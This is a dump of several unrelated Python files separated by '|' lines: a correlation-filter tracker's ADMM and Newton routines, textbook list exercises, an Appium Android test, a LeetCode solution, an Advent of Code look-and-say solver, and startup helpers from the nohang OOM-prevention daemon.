    S_xx = np.sum(np.conj(xf) * xf, 2)  # per-pixel spectral energy of xf
    while i <= self.admm_iterations:
        B = S_xx + (T * mu)
        S_lx = np.sum(np.conj(xf) * l_f, axis=2)
        S_hx = np.sum(np.conj(xf) * h_f, axis=2)
        tmp0 = (1 / (T * mu) * (self.yf[:, :, None] * xf)) - ((1 / mu) * l_f)+ h_f
        tmp1 = 1 / (T * mu) * (xf * ((S_xx * self.yf)[:, :, None]))
        tmp2 = 1 / mu * (xf * (S_lx[:, :, None]))
        tmp3 = xf * S_hx[:, :, None]
        # solve for g (closed form per Fourier pixel)
        g_f = tmp0 - (tmp1 - tmp2 + tmp3) / B[:, :, None]
        # solve for h: go to the spatial domain, crop to the small filter
        # support, zero-pad back, and re-transform.
        h = (T / ((mu * T) + self.admm_lambda)) * ifft2(mu * g_f + l_f)
        xs, ys, h = self.get_subwindow_no_window(h,
                                                 (int(self.feature_map_sz[0] / 2), int(self.feature_map_sz[1] / 2)),
                                                 self.small_filter_sz)
        t = np.zeros((self.feature_map_sz[1], self.feature_map_sz[0], h.shape[2]),dtype=np.complex64)
        t[ys,xs,:] = h
        h_f = fft2(t)
        # dual update, then grow the penalty
        l_f = l_f + (mu * (g_f - h_f))
        mu = min(beta * mu, mumax)
        i += 1
    return g_f
def get_sub_window(self, img, center, model_sz, scaled_sz=None):
    """Crop a patch around `center` and resize it to model_sz.

    :param img: source frame
    :param center: (x, y) patch centre
    :param model_sz: (w, h) output size
    :param scaled_sz: optional (w, h) crop size before the resize
    :return: uint8 patch of size model_sz
    """
    model_sz = (int(model_sz[0]), int(model_sz[1]))
    if scaled_sz is None:
        sz = model_sz
    else:
        sz = scaled_sz
    # Guard against degenerate (sub-2-pixel) crop sizes.
    sz = (max(int(sz[0]), 2), max(int(sz[1]), 2))
    im_patch = cv2.getRectSubPix(img, sz, center)
    if scaled_sz is not None:
        im_patch = self.mex_resize(im_patch, model_sz)
    return im_patch.astype(np.uint8)
def resize_dft2(self, input_dft, desired_sz):
    """Resize a stack of 2-D DFTs to desired_sz=(w, h) by copying the four
    low-frequency corner quadrants and rescaling the energy.

    Returns input_dft unchanged when the size already matches.
    """
    src_h, src_w, n_maps = input_dft.shape
    if desired_sz[0] == src_w and desired_sz[1] == src_h:
        return input_dft
    min_w = int(min(src_w, desired_sz[0]))
    min_h = int(min(src_h, desired_sz[1]))
    # Rescale so spatial-domain magnitudes stay comparable after resizing.
    scale = desired_sz[0] * desired_sz[1] / (src_h * src_w)
    out = np.zeros((desired_sz[1], desired_sz[0], n_maps), dtype=np.complex64)
    # Split points between positive- and negative-frequency halves.
    pos_w = int(np.ceil(min_w / 2))
    pos_h = int(np.ceil(min_h / 2))
    neg_w = int(np.floor((min_w - 1) / 2)) - 1
    neg_h = int(np.floor((min_h - 1) / 2)) - 1
    out[:pos_h, :pos_w, :] = scale * input_dft[:pos_h, :pos_w, :]
    out[:pos_h, -1 - neg_w:, :] = scale * input_dft[:pos_h, -1 - neg_w:, :]
    out[-1 - neg_h:, :pos_w, :] = scale * input_dft[-1 - neg_h:, :pos_w, :]
    out[-1 - neg_h:, -1 - neg_w:, :] = scale * input_dft[-1 - neg_h:, -1 - neg_w:, :]
    return out
def mex_resize(self, img, sz, method='auto'):
    """Resize img to sz=(w, h).

    'antialias' forces INTER_AREA, 'linear' forces INTER_LINEAR; any other
    value picks INTER_LINEAR when enlarging the height, else INTER_AREA.
    """
    target = (int(sz[0]), int(sz[1]))
    if method == 'antialias':
        interpolation = cv2.INTER_AREA
    elif method == 'linear':
        interpolation = cv2.INTER_LINEAR
    elif target[1] > img.shape[0]:
        # Upscaling: linear interpolation.
        interpolation = cv2.INTER_LINEAR
    else:
        # Downscaling (or same size): area averaging.
        interpolation = cv2.INTER_AREA
    return cv2.resize(img, target, interpolation=interpolation)
"""
I didn't know how to convert matlab function mtimesx to numpy
Just finetune from 4kubo's implementation
https://github.com/4kubo/bacf_python/blob/master/special_operation/resp_newton.py
"""
def resp_newton(self,response, responsef, iterations, ky, kx, use_sz):
    """Refine the response maximum to sub-cell accuracy with Newton's
    method evaluated through the response's DFT.

    :param response: spatial response maps, (H x W x n_scales)
    :param responsef: their DFTs, same trailing scale axis
    :param iterations: number of Newton iterations
    :param ky, kx: frequency index vectors for rows / columns
    :param use_sz: (w, h) response-map size
    :return: (disp_row, disp_col, sind) — sub-cell displacement and the
        index of the best-scoring scale
    """
    n_scale = response.shape[2]
    # Initial guess: integer argmax per scale.
    index_max_in_row = np.argmax(response, 0)
    max_resp_in_row = np.max(response, 0)
    index_max_in_col = np.argmax(max_resp_in_row, 0)
    init_max_response = np.max(max_resp_in_row, 0)
    col = index_max_in_col.flatten(order="F")
    max_row_perm = index_max_in_row
    row = max_row_perm[col, np.arange(n_scale)]
    # Wrap the argmax into signed displacements around the origin.
    trans_row = (row - 1 + np.floor((use_sz[1] - 1) / 2)) % use_sz[1] \
                - np.floor((use_sz[1] - 1) / 2) + 1
    trans_col = (col - 1 + np.floor((use_sz[0] - 1) / 2)) % use_sz[0] \
                - np.floor((use_sz[0] - 1) / 2) + 1
    # Positions expressed as angles in [-pi, pi).
    init_pos_y = np.reshape(2 * np.pi * trans_row / use_sz[1], (1, 1, n_scale))
    init_pos_x = np.reshape(2 * np.pi * trans_col / use_sz[0], (1, 1, n_scale))
    max_pos_y = init_pos_y
    max_pos_x = init_pos_x
    # pre-compute complex exponential
    iky = 1j * ky
    exp_iky = np.tile(iky[np.newaxis, :, np.newaxis], (1, 1, n_scale)) * \
              np.tile(max_pos_y, (1, ky.shape[0], 1))
    exp_iky = np.exp(exp_iky)
    ikx = 1j * kx
    exp_ikx = np.tile(ikx[:, np.newaxis, np.newaxis], (1, 1, n_scale)) * \
              np.tile(max_pos_x, (kx.shape[0], 1, 1))
    exp_ikx = np.exp(exp_ikx)
    # gradient_step_size = gradient_step_size / prod(use_sz)
    ky2 = ky * ky
    kx2 = kx * kx
    iter = 1  # NOTE(review): shadows the builtin `iter`
    while iter <= iterations:
        # Compute gradient
        ky_exp_ky = np.tile(ky[np.newaxis, :, np.newaxis], (1, 1, exp_iky.shape[2])) * exp_iky
        kx_exp_kx = np.tile(kx[:, np.newaxis, np.newaxis], (1, 1, exp_ikx.shape[2])) * exp_ikx
        y_resp = np.einsum('ilk,ljk->ijk', exp_iky, responsef)
        resp_x = np.einsum('ilk,ljk->ijk', responsef, exp_ikx)
        grad_y = -np.imag(np.einsum('ilk,ljk->ijk', ky_exp_ky, resp_x))
        grad_x = -np.imag(np.einsum('ilk,ljk->ijk', y_resp, kx_exp_kx))
        ival = 1j * np.einsum('ilk,ljk->ijk', exp_iky, resp_x)
        H_yy = np.tile(ky2[np.newaxis, :, np.newaxis], (1, 1, n_scale)) * exp_iky
        H_yy = np.real(-np.einsum('ilk,ljk->ijk', H_yy, resp_x) + ival)
        H_xx = np.tile(kx2[:, np.newaxis, np.newaxis], (1, 1, n_scale)) * exp_ikx
        H_xx = np.real(-np.einsum('ilk,ljk->ijk', y_resp, H_xx) + ival)
        H_xy = np.real(-np.einsum('ilk,ljk->ijk', ky_exp_ky, np.einsum('ilk,ljk->ijk', responsef, kx_exp_kx)))
        det_H = H_yy * H_xx - H_xy * H_xy
        # Compute new position using newtons method
        diff_y = (H_xx * grad_y - H_xy * grad_x) / det_H
        diff_x = (H_yy * grad_x - H_xy * grad_y) / det_H
        max_pos_y = max_pos_y - diff_y
        max_pos_x = max_pos_x - diff_x
        # Evaluate maximum
        exp_iky = np.tile(iky[np.newaxis, :, np.newaxis], (1, 1, n_scale)) * \
                  np.tile(max_pos_y, (1, ky.shape[0], 1))
        exp_iky = np.exp(exp_iky)
        exp_ikx = np.tile(ikx[:, np.newaxis, np.newaxis], (1, 1, n_scale)) * \
                  np.tile(max_pos_x, (kx.shape[0], 1, 1))
        exp_ikx = np.exp(exp_ikx)
        iter = iter + 1
    max_response = 1 / np.prod(use_sz) * \
                   np.real(np.einsum('ilk,ljk->ijk',
                                     np.einsum('ilk,ljk->ijk', exp_iky, responsef),
                                     exp_ikx))
    # check for scales that have not increased in score
    ind = max_response < init_max_response
    max_response[0, 0, ind.flatten()] = init_max_response[ind.flatten()]
    max_pos_y[0, 0, ind.flatten()] = init_pos_y[0, 0, ind.flatten()]
    max_pos_x[0, 0, ind.flatten()] = init_pos_x[0, 0, ind.flatten()]
    sind = int(np.nanargmax(max_response, 2))
    # Map angular positions back to pixel displacements.
    disp_row = (np.mod(max_pos_y[0, 0, sind] + np.pi, 2 * np.pi) - np.pi) / (2 * np.pi) * use_sz[1]
    disp_col = (np.mod(max_pos_x[0, 0, sind] + np.pi, 2 * np.pi) - np.pi) / (2 * np.pi) * use_sz[0]
    return disp_row, disp_col, sind
|
# Exercises 4-1 .. 4-12 ("Python Crash Course" chapter 4): lists and loops.
# 4-1
print('4-1')
pizzas = ["cheese", "pepperoni", "anchovies", "mushroom"]
for topping in pizzas:
    print('I love ' + topping + ' on my pizza.')
print('I really love pizza!')
print("\r")
# 4-2
print('4-2')
animals = ['dogs', 'cats', 'frogs', 'rabbits', 'moles', 'capybaras', 'birds']
for animal in animals:
    # BUG FIX: replace(animal[-1], '') removed EVERY occurrence of the last
    # character (e.g. 'sparrows' -> 'parrow'); strip only the trailing 's'.
    print('A ' + animal[:-1] + ' would make a great pet!')
print('All of these animals have four legs!')
print("\r")
# 4-3
print('4-3')
for number in range(1, 21):
    print(number, end=' ')
print("\n")
# 4-6
print("4-6")
for number in range(1, 21, 2):
    print(number, end=' ')
print("\n")
# 4-7
print("4-7")
# Renamed from `list`, which shadowed the builtin.
multiples_of_three = [number for number in range(3, 31, 3)]
print(multiples_of_three)
print("\r")
# 4-8
print("4-8")
tencubes = []
for value in range(1, 11):
    tencubes.append(value ** 3)
print(tencubes)
print("\r")
# 4-9
print("4-9")
cubelist = [cube ** 3 for cube in range(1, 11)]
print(cubelist)
print("\r")
# 4-10
print("4-10")
print('The first three items on the list of animals are:')
print(animals[:3])
print('\nThe middle three items on the list of animals are:')
# BUG FIX: [2:6] printed FOUR items; three middle items are [2:5].
print(animals[2:5])
print('\nThe last three items on the list of animals are:')
print(animals[-3:])
print("\r")
# 4-11
print("4-11")
my_foods = ['pizza', 'falafel', 'carrot cake', 'curry']
friends_foods = my_foods[:]  # copy, so appends stay independent
my_foods.append('steak')
friends_foods.append('chutney')
print(my_foods)
print(friends_foods)
print("\r")
# 4-12
print("4-12")  # BUG FIX: section was mislabeled "4-11"
for food in my_foods:
    print(food + ' ', end=' ')
print('\r')
for food in friends_foods:
    print(food + ' ', end=' ')
|
from appium import webdriver
import pytest
from Page_Object_Pro.Page.search import Search_Page
from Page_Object_Pro.Base.base import Base
class Test_Searchx:
    """Appium UI tests for the Settings app's search feature (pytest class)."""
    def setup_class(self):
        # NOTE(review): pytest passes the class object to setup_class, so
        # `self` here is actually the class and these become class attributes.
        desired_caps = {}
        desired_caps['platformName'] = 'Android'
        desired_caps['platformVersion'] = '8.0.0'
        desired_caps['deviceName'] = 'A5RNW18208010252'
        desired_caps['appPackage'] = 'com.android.settings'
        desired_caps['appActivity'] = '.HWSettings'
        # Connect to a locally running Appium server.
        self.driver = webdriver.Remote("http://127.0.0.1:4723/wd/hub", desired_caps)
        self.search_obj=Search_Page(self.driver)
        self.searchs_obj = Base(self.driver)
    def teardown_class(self):
        # Close the driver session after all tests in the class ran.
        self.driver.quit()
    def test_search01(self):
        # Open the search box.
        self.search_obj.click_search()
    @pytest.mark.parametrize("text",[1,2,3])
    def test_search02(self,text):
        # Type each parametrized value into the search field.
        self.search_obj.search_input(text)
    def test_search03(self):
        # Leave the search screen.
        self.search_obj.click_return()
if __name__ == '__main__':
pytest.main() |
# Given an array of unique integers salary where salary[i] is the salary
# of the employee i.
#
# Return the average salary of employees excluding the
# minimum and maximum salary.
class Solution:
    def average(self, salary):
        """Return the mean of `salary` excluding one minimum and one maximum.

        The problem guarantees unique integers and len(salary) >= 3.
        Uses min/max directly (O(n)) instead of sorting (O(n log n)).

        :param salary: list of unique integer salaries
        :return: float average of the remaining salaries
        """
        return (sum(salary) - min(salary) - max(salary)) / (len(salary) - 2)
if __name__ == "__main__":
    # Smoke test with the LeetCode example; expected output: 2500.0.
    sample_salaries = [4000, 3000, 1000, 2000]
    print(Solution().average(sample_salaries))
|
# @see https://adventofcode.com/2015/day/10
import re
data = '1113122113'
def step(n: str):
    """One look-and-say iteration: every run of equal digits becomes
    '<run length><digit>' (e.g. '111' -> '31')."""
    pieces = []
    i = 0
    while i < len(n):
        j = i
        # Extend j to the end of the current run of identical digits.
        while j < len(n) and n[j] == n[i]:
            j += 1
        pieces.append(str(j - i) + n[i])
        i = j
    return ''.join(pieces)
def seq(d: str, steps: int):
    """Apply `step` to d repeatedly, `steps` times, and return the result."""
    current = d
    for _ in range(steps):
        current = step(current)
    return current
# Part 1: 40 look-and-say iterations of the puzzle input.
print('------------ PART 01 -------------')
num = seq(data, 40)
print('The length of the result after 40 steps:', len(num))
# Part 2: 10 more iterations on top of part 1's result (50 total).
print('\n------------ PART 02 -------------')
num = seq(num, 10)
print('The length of the result after 50 steps:', len(num)) |
#!/usr/bin/env python3
"""A daemon that prevents OOM in Linux systems."""
import os
from ctypes import CDLL
from time import sleep, monotonic, process_time
from operator import itemgetter
from sys import stdout, stderr, argv, exit
from re import search
from sre_constants import error as invalid_re
from signal import signal, SIGKILL, SIGTERM, SIGINT, SIGQUIT, SIGHUP
###########################################################################################################################
###########################################################################################################################
# 1. Before the main loop (startup helpers)
def find_cgroup_indexes():
    """Find cgroup-line positions in /proc/*/cgroup file.

    Returns (cgroup_systemd_index, cgroup_unified_index); either may be
    None if the corresponding hierarchy is absent. On unified-only systems
    (no name=systemd v1 mount) the systemd index falls back to the
    unified one.
    """
    cgroup_systemd_index = cgroup_unified_index = None
    with open('/proc/self/cgroup') as f:
        for index, line in enumerate(f):
            if ':name=systemd:' in line:
                cgroup_systemd_index = index
            if line.startswith('0::'):
                cgroup_unified_index = index
    (cgroup_systemd_mountpoint, cgroup_unified_mountpoint
     ) = find_cgroup_mountpoints()
    if (cgroup_systemd_mountpoint is None and
            cgroup_unified_mountpoint is not None):
        # Unified-only system: use the v2 line for the systemd lookup too.
        if os.path.exists('{}/system.slice'.format(cgroup_unified_mountpoint)):
            cgroup_systemd_index = cgroup_unified_index
    return cgroup_systemd_index, cgroup_unified_index
def find_cgroup_mountpoints():
    """Parse /proc/mounts for the cgroup-v1 name=systemd mountpoint and the
    cgroup-v2 (unified) mountpoint.

    Returns (cgroup_systemd_mountpoint, cgroup_unified_mountpoint); each is
    None when not found, and the v1 mountpoint is discarded if it lacks a
    system.slice directory.
    """
    mounts = '/proc/mounts'
    cgroup_systemd_marker = ',name=systemd 0 0'
    cgroup_systemd_separator = ' cgroup rw,'
    cgroup_unified_separator = ' cgroup2 rw,'
    cgroup_unified_mountpoint = cgroup_systemd_mountpoint = None
    with open(mounts) as f:
        for line in f:
            if cgroup_systemd_marker in line:
                cgroup_systemd_mountpoint = line.partition(
                    cgroup_systemd_separator)[0].partition(' ')[2]
                continue
            if cgroup_unified_separator in line:
                cgroup_unified_mountpoint = line.partition(
                    cgroup_unified_separator)[0].partition(' ')[2]
    # NOTE(review): when no v1 mount was found this formats the path
    # 'None/system.slice', which never exists, so the value stays None.
    if not os.path.exists('{}/system.slice'.format(cgroup_systemd_mountpoint)):
        cgroup_systemd_mountpoint = None
    return cgroup_systemd_mountpoint, cgroup_unified_mountpoint
def get_pid_list():
    """Return /proc entries that have an exe link, i.e. live userspace
    processes (kernel threads and zombies have no /proc/<pid>/exe)."""
    return [
        pid for pid in os.listdir('/proc')
        if os.path.exists('/proc/' + pid + '/exe')
    ]
def get_non_decimal_pids():
    """Return entries of the module-level pid_list whose first character is
    not a decimal digit (i.e. non-PID /proc entries such as 'self').

    Idiom fix: comprehension with `not` replaces the append-loop that
    compared a bool with `is False`.
    """
    return [pid for pid in pid_list if not pid[0].isdecimal()]
def log(*msg):
    """Print *msg to stdout and, when the module-level separate_log flag is
    enabled, mirror it to the separate log via the logging module.
    """
    print(*msg)
    if separate_log:
        logging.info(*msg)
def conf_parse_bool(param):
    """Read a boolean parameter from the config_dict.

    param: config_dict key whose value must be the string 'True' or 'False'
    returns: bool; exits with status 1 when the key is missing or invalid
    """
    if param not in config_dict:
        errprint('All the necessary parameters must be in the config')
        errprint('There is no "{}" parameter in the config'.format(param))
        exit(1)
    raw_value = config_dict[param]
    if raw_value == 'True':
        return True
    if raw_value == 'False':
        return False
    errprint('Invalid value of the "{}" parameter.'.format(param))
    errprint('Valid values are True and False.')
    errprint('Exit')
    exit(1)
def calculate_percent(arg_key):
    """Parse the config value for `arg_key`, given as 'N %' or 'N M' (MiB).

    Converts against the module-level mem_total and returns the triple
    (mem_min_kb, mem_min_mb, mem_min_percent); exits with status 1 on any
    invalid or missing value.
    """
    if arg_key in config_dict:
        mem_min = config_dict[arg_key]
        if mem_min.endswith('%'):
            # truncate percents, so we have a number
            mem_min_percent = mem_min[:-1].strip()
            # then 'float test'
            mem_min_percent = string_to_float_convert_test(mem_min_percent)
            if mem_min_percent is None:
                errprint('Invalid {} value, not float\nExit'.format(arg_key))
                exit(1)
            # Final validations...
            if mem_min_percent < 0 or mem_min_percent > 100:
                errprint(
                    '{}, as percents value, out of ran'
                    'ge [0; 100]\nExit'.format(arg_key))
                exit(1)
            # soft_threshold_min_mem_percent is clean and valid float percentage. Can
            # translate into Kb
            mem_min_kb = mem_min_percent / 100 * mem_total
            mem_min_mb = round(mem_min_kb / 1024)
        elif mem_min.endswith('M'):
            mem_min_mb = string_to_float_convert_test(mem_min[:-1].strip())
            if mem_min_mb is None:
                errprint('Invalid {} value, not float\nExit'.format(arg_key))
                exit(1)
            mem_min_kb = mem_min_mb * 1024
            if mem_min_kb > mem_total:
                errprint(
                    '{} value can not be greater then MemT'
                    'otal ({} MiB)\nExit'.format(
                        arg_key, round(
                            mem_total / 1024)))
                exit(1)
            mem_min_percent = mem_min_kb / mem_total * 100
        else:
            log('Invalid {} units in config.\n Exit'.format(arg_key))
            exit(1)
            mem_min_percent = None  # NOTE(review): unreachable after exit(1)
    else:
        log('{} not in config\nExit'.format(arg_key))
        exit(1)
        mem_min_percent = None  # NOTE(review): unreachable after exit(1)
    return mem_min_kb, mem_min_mb, mem_min_percent
def string_to_float_convert_test(string):
    """Return float(string), or None when it is not a valid float literal."""
    try:
        result = float(string)
    except ValueError:
        return None
    return result
def string_to_int_convert_test(string):
    """Return int(string), or None when it is not a valid integer literal."""
    try:
        result = int(string)
    except ValueError:
        return None
    return result
def errprint(*text):
    """Print *text to stderr (flushed) and, when separate-log mode is on,
    mirror it to the separate log.
    """
    print(*text, file=stderr, flush=True)
    try:
        if separate_log:
            # BUG FIX: was `logging.info(*msg)` — `msg` is undefined in this
            # scope, so the intended log line always died with a (silently
            # swallowed) NameError. Use the actual parameter `text`.
            logging.info(*text)
    except NameError:
        # separate_log / logging may not exist yet during early startup.
        pass
def get_swap_threshold_tuple(string):
    """Parse a swap threshold config value.

    Returns (percent, True) for 'N%'-style values, or (KiB, False) for
    'NM'-style values (MiB converted to KiB). Exits with status 1 on any
    malformed value.

    Fix: the value was parsed twice (validity probe via
    string_to_float_convert_test, then float() again); parse once with
    try/except instead.
    """
    if string.endswith('%'):
        try:
            value = float(string[:-1])
        except ValueError:
            errprint('somewhere swap unit is not float_%')
            exit(1)
        if value < 0 or value > 100:
            errprint('invalid value, must be from the range[0; 100] %')
            exit(1)
        return value, True
    if string.endswith('M'):
        try:
            value = float(string[:-1]) * 1024
        except ValueError:
            errprint('somewhere swap unit is not float_M')
            exit(1)
        if value < 0:
            errprint('invalid unit in config (negative value)')
            exit(1)
        return value, False
    errprint(
        'Invalid config file. There are invalid units somewhere\nExit')
    exit(1)
def mlockall():
    """Lock all memory to prevent swapping nohang process.

    Tries MCL_ONFAULT first (lock pages as they fault in, Linux >= 4.4) and
    falls back to plain MCL_CURRENT | MCL_FUTURE on older kernels; only
    warns when neither call succeeds.
    """
    MCL_CURRENT = 1
    MCL_FUTURE = 2
    MCL_ONFAULT = 4
    libc = CDLL('libc.so.6', use_errno=True)
    result = libc.mlockall(
        MCL_CURRENT | MCL_FUTURE | MCL_ONFAULT
    )
    if result != 0:
        # Fallback for kernels without MCL_ONFAULT support.
        result = libc.mlockall(
            MCL_CURRENT | MCL_FUTURE
        )
        if result != 0:
            log('WARNING: cannot lock all memory')
        else:
            pass
            # log('All memory locked with MCL_CURRENT | MCL_FUTURE')
    else:
        pass
        # log('All memory locked with MCL_CURRENT | MCL_FUTURE | MCL_ONFAULT')
def signal_handler(signum, frame):
    """Terminate gracefully on the first fatal signal.

    Re-binds every signal in sig_list to the ignoring handler so repeated
    signals cannot interrupt shutdown, prints final statistics and nohang's
    own CPU usage, then exits.
    """
    for i in sig_list:
        signal(i, signal_handler_inner)
    log('Signal handler called with the {} signal '.format(
        sig_dict[signum]))
    update_stat_dict_and_print(None)
    m1 = monotonic()
    pt1 = process_time()
    # CPU usage = process time / wall time since startup (m0, pt0 globals).
    x = (pt1 - pt0) / (m1 - m0) * 100
    log('CPU usage by nohang since it started: {}%'.format(round(x, 3)))
    log('Exit')
    exit()
def signal_handler_inner(signum, frame):
    """Log and ignore signals received while shutdown is already running."""
    log('Signal handler called with the {} signal (ignored) '.format(
        sig_dict[signum]))
def valid_re(reg_exp):
    """Validate a regular expression from the config; log the offending
    pattern and exit(1) when it does not compile."""
    try:
        search(reg_exp, '')
        return
    except invalid_re:
        pass
    log('Invalid config: invalid regexp: {}'.format(reg_exp))
    exit(1)
def check_config():
    """Pretty-print every effective configuration value to the log.

    Purely informational dump, organized in the same numbered sections as
    the config file. When check_config_flag is set (config-check CLI mode)
    it prints 'config is OK' and exits.
    """
    log('#' * 79)
    log('\n1. Common zram settings')
    log(' zram_checking_enabled: {}'.format(zram_checking_enabled))
    log('\n2. Common PSI settings')
    log(' psi_checking_enabled: {}'.format(psi_checking_enabled))
    log(' psi_path: {}'.format(psi_path))
    log(' psi_metrics: {}'.format(psi_metrics))
    log(' psi_excess_duration: {} sec'.format(psi_excess_duration))
    log(' psi_post_action_delay: {} sec'.format(psi_post_action_delay))
    log('\n3. Poll rate')
    log(' fill_rate_mem: {}'.format(fill_rate_mem))
    log(' fill_rate_swap: {}'.format(fill_rate_swap))
    log(' fill_rate_zram: {}'.format(fill_rate_zram))
    log(' max_sleep: {} sec'.format(max_sleep))
    log(' min_sleep: {} sec'.format(min_sleep))
    log(' over_sleep: {} sec'.format(over_sleep))
    log('\n4. Warnings and notifications')
    log(' post_action_gui_notifications: {}'.format(
        post_action_gui_notifications))
    log(' low_memory_warnings_enabled: {}'.format(
        low_memory_warnings_enabled))
    log(' warning_exe: {}'.format(warning_exe))
    log(' warning_threshold_min_mem: {} MiB, {} %'.format(round(
        warning_threshold_min_mem_mb), round(
        warning_threshold_min_mem_percent, 1)))
    log(' warning_threshold_min_swap: {}'.format
        (warning_threshold_min_swap))
    log(' warning_threshold_max_zram: {} MiB, {} %'.format(round(
        warning_threshold_max_zram_mb), round(
        warning_threshold_max_zram_percent, 1)))
    log(' warning_threshold_max_psi: {}'.format(
        warning_threshold_max_psi))
    log(' min_post_warning_delay: {} sec'.format(
        min_post_warning_delay))
    log(' env_cache_time: {}'.format(env_cache_time))
    log('\n5. Soft threshold')
    log(' soft_threshold_min_mem: {} MiB, {} %'.format(
        round(soft_threshold_min_mem_mb), round(
            soft_threshold_min_mem_percent, 1)))
    log(' soft_threshold_min_swap: {}'.format(soft_threshold_min_swap))
    log(' soft_threshold_max_zram: {} MiB, {} %'.format(
        round(soft_threshold_max_zram_mb), round(
            soft_threshold_max_zram_percent, 1)))
    log(' soft_threshold_max_psi: {}'.format(soft_threshold_max_psi))
    log('\n6. Hard threshold')
    log(' hard_threshold_min_mem: {} MiB, {} %'.format(
        round(hard_threshold_min_mem_mb), round(
            hard_threshold_min_mem_percent, 1)))
    log(' hard_threshold_min_swap: {}'.format(hard_threshold_min_swap))
    log(' hard_threshold_max_zram: {} MiB, {} %'.format(
        round(hard_threshold_max_zram_mb), round(
            hard_threshold_max_zram_percent, 1)))
    log(' hard_threshold_max_psi: {}'.format(hard_threshold_max_psi))
    log('\n7. Customize victim selection: adjusting badness of processes')
    log('\n7.1. Ignore positive oom_score_adj')
    log(' ignore_positive_oom_score_adj: {}'.format(
        ignore_positive_oom_score_adj))
    log('\n7.3. ')
    log('7.3.1. Matching process names with RE patterns')
    if len(badness_adj_re_name_list) > 0:
        log(' regexp: badness_adj:')
        for i in badness_adj_re_name_list:
            log(' {} {}'.format(i[1], i[0]))
    else:
        log(' (not set)')
    log('7.3.2. Matching CGroup_systemd-line with RE patterns')
    if len(badness_adj_re_cgroup_systemd_list) > 0:
        log(' regexp: badness_adj:')
        for i in badness_adj_re_cgroup_systemd_list:
            log(' {} {}'.format(i[1], i[0]))
    else:
        log(' (not set)')
    log('7.3.3. Matching CGroup_unified-line with RE patterns')
    if len(badness_adj_re_cgroup_unified_list) > 0:
        log(' regexp: badness_adj:')
        for i in badness_adj_re_cgroup_unified_list:
            log(' {} {}'.format(i[1], i[0]))
    else:
        log(' (not set)')
    log('7.3.4. Matching eUIDs with RE patterns')
    if len(badness_adj_re_uid_list) > 0:
        log(' regexp: badness_adj:')
        for i in badness_adj_re_uid_list:
            log(' {} {}'.format(i[1], i[0]))
    else:
        log(' (not set)')
    log('7.3.5. Matching realpath with RE patterns')
    if len(badness_adj_re_realpath_list) > 0:
        log(' regexp: badness_adj:')
        for i in badness_adj_re_realpath_list:
            log(' {} {}'.format(i[1], i[0]))
    else:
        log(' (not set)')
    log('7.3.5.1. Matching cwd with RE patterns')
    if len(badness_adj_re_cwd_list) > 0:
        log(' regexp: badness_adj:')
        for i in badness_adj_re_cwd_list:
            log(' {} {}'.format(i[1], i[0]))
    else:
        log(' (not set)')
    log('7.3.6. Matching cmdlines with RE patterns')
    if len(badness_adj_re_cmdline_list) > 0:
        log(' regexp: badness_adj:')
        for i in badness_adj_re_cmdline_list:
            log(' {} {}'.format(i[1], i[0]))
    else:
        log(' (not set)')
    log('7.3.7. Matching environ with RE patterns')
    if len(badness_adj_re_environ_list) > 0:
        log(' regexp: badness_adj:')
        for i in badness_adj_re_environ_list:
            log(' {} {}'.format(i[1], i[0]))
    else:
        log(' (not set)')
    log('\n8. Customize corrective actions')
    if len(soft_actions_list) > 0:
        log(' Match by: regexp: command: ')
        for i in soft_actions_list:
            log(' {} {} {}'.format(i[0], i[1], i[2]))
    else:
        log(' (not set)')
    log('\n9. Misc')
    log(' max_soft_exit_time: {} sec'.format(max_soft_exit_time))
    log(' min_badness: {}'.format(min_badness))
    log(' post_soft_action_delay: {} sec'.format(
        post_soft_action_delay))
    log(' post_zombie_delay: {} sec'.format(post_zombie_delay))
    log(' victim_cache_time: {} sec'.format(victim_cache_time))
    log(' exe_timeout: {} sec'.format(exe_timeout))
    log('\n10. Verbosity')
    log(' print_config_at_startup: {}'.format(print_config_at_startup))
    log(' print_mem_check_results: {}'.format(print_mem_check_results))
    log(' min_mem_report_interval: {} sec'.format(
        min_mem_report_interval))
    log(' print_proc_table: {}'.format(print_proc_table))
    log(' extra_table_info: {}'.format(extra_table_info))
    log(' print_victim_status: {}'.format(print_victim_status))
    log(' print_victim_cmdline: {}'.format(print_victim_cmdline))
    log(' max_victim_ancestry_depth: {}'.format(max_victim_ancestry_depth))
    log(' print_statistics: {}'.format(print_statistics))
    log(' debug_gui_notifications: {}'.format(debug_gui_notifications))
    log(' debug_psi: {}'.format(debug_psi))
    log(' debug_sleep: {}'.format(debug_sleep))
    log(' debug_threading: {}'.format(debug_threading))
    log(' separate_log: {}'.format(separate_log))
    log('#' * 79)
    if check_config_flag:
        # --check mode: report success and stop here.
        log('config is OK')
        exit()
def print_version():
    """Print the nohang version (read from /etc/nohang/version) and exit."""
    try:
        version = rline1('/etc/nohang/version')
    except FileNotFoundError:
        version = None
    if version is None:
        print('nohang unknown version')
    else:
        print('nohang ' + version)
    exit()
def rline1(path):
    """Return the first line of *path* with trailing whitespace stripped.

    Falls back to a lossy binary read for undecodable files; returns None
    for an empty file.
    """
    try:
        with open(path) as f:
            for line in f:
                return line.rstrip()
    except UnicodeDecodeError:
        # Undecodable file: read a bounded prefix, drop invalid byte
        # sequences, and keep everything up to the first newline.
        # (Resolves the original "use partition()!" TODO.)
        with open(path, 'rb') as f:
            return f.read(999).decode(
                'utf-8', 'ignore').partition('\n')[0]
def update_stat_dict_and_print(key):
    """Increment the event counter for `key` (when not None) and, if
    print_statistics is enabled, log all accumulated counters with the
    daemon's uptime.
    """
    if key is not None:
        if key not in stat_dict:
            stat_dict.update({key: 1})
        else:
            new_value = stat_dict[key] + 1
            stat_dict.update({key: new_value})
    if print_statistics:
        stats_msg = 'Total stat (what happened in the last {}):'.format(
            format_time(monotonic() - start_time))
        for i in stat_dict:
            stats_msg += '\n {}: {}'.format(i, stat_dict[i])
        log(stats_msg)
def format_time(t):
    """Render a duration in seconds as 'S sec', 'M min S sec', or
    'H h M min S sec' (the hour form only above one hour)."""
    total = int(t)
    if total < 60:
        return '{} sec'.format(total)
    if total > 3600:
        hours, remainder = divmod(total, 3600)
        minutes, seconds = divmod(remainder, 60)
        return '{} h {} min {} sec'.format(hours, minutes, seconds)
    minutes, seconds = divmod(total, 60)
    return '{} min {} sec'.format(minutes, seconds)
def func_print_proc_table():
    """Print the full process table via find_victim() and exit.

    The local print_proc_table deliberately shadows the module-level flag.
    """
    print_proc_table = True
    find_victim(print_proc_table)
    exit()
###########################################################################################################################
###########################################################################################################################
# 2. Inside the main loop (per-iteration checks)
def check_mem_swap_exceeded():
